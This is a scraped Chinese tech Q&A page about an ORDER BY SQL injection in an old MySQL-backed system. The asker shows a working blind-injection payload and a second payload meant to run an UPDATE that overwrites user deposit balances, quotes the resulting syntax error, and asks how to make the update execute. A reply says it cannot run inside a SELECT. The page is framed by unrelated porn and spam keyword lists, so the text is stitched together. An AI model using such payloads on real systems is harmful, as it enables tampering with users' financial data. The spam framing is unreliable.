色综合图-色综合图片-色综合图片二区150p-色综合图区-玖玖国产精品视频-玖玖香蕉视频

您的位置:首頁技術(shù)文章
文章詳情頁

mysql - sql報(bào)錯(cuò)原因?

瀏覽:95日期:2022-06-13 10:08:51

問題描述

發(fā)現(xiàn)一個(gè)正在維護(hù)的老系統(tǒng)的基于orderBy的sql注入漏洞,準(zhǔn)備驗(yàn)證一下,

我先執(zhí)行這個(gè)sql注入,是可以的

SELECT sysitem_item.item_id FROM sysitem_item `sysitem_item` ORDER BY (selectcasewhen(1=1)then1else(select depositfrom sysuser_user_deposit)end)=1 ASC LIMIT 20 OFFSET 0

但是當(dāng)我執(zhí)行這個(gè)帶update語句的sql時(shí)報(bào)錯(cuò)了:

SELECT sysitem_item.item_id FROM sysitem_item `sysitem_item` ORDER BY (selectcasewhen(1=1)then1else(updatesysuser_user_depositsetdeposit=11)end)=1 ASC LIMIT 20 OFFSET 0

報(bào)錯(cuò)

<code>#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ’update<br>sysuser_user_deposit<br>set<br>deposit=11)end)=1 ASC LIMIT 20 OFFSET 0’ at line 9</code>

我應(yīng)該如何讓他執(zhí)行update?

問題解答

回答1:

主體是select的時(shí)候,里面是不能update的,否則執(zhí)行不了的,mybatis這種注入我試過,<select>里執(zhí)行update直接報(bào)錯(cuò),注入不了

相關(guān)文章:
主站蜘蛛池模板: 中文字幕日韩精品中文区 | 久久精品免费一区二区三区 | 怡红院成人永久免费看 | 13一14周岁毛片免费 | 九九精品视频一区二区三区 | 黄色美女视频免费 | 日本黄网站高清色大全 | 538在线视频二三区视视频 | 91久久久久久久 | 亚洲精品久久久中文字 | 黄网在线观看免费 | 国产一精品一aⅴ一免费 | 香蕉网站狼人久久五月亭亭 | 欧美成人精品手机在线观看 | 国产欧美日韩综合一区二区三区 | 国内精品美女写真视频 | 干欧美女人 | 仑乱高清在线一级播放 | 国产91专区 | 日本www视频在线观看 | 94欧美setu | 成人高清视频在线观看 | 黄色网址www | 亚洲免费看片 | 精品国产品香蕉在线观看 | 日韩在线欧美在线 | 欧美日韩成人在线视频 | 97影院理伦在线观看 | 国产精品手机在线亚洲 | 日韩在线一区二区三区 | 男女一级爽爽快视频 | 欧美性群另类交 | 女人被男人躁得好爽免费视频免费 | 国产免费资源 | 欧美国产视频 | 欧洲成人全免费视频网站 | 国产免费高清福利拍拍拍 | 欧美一级黄 | 18在线| 日韩 综合 | 亚洲免费在线 |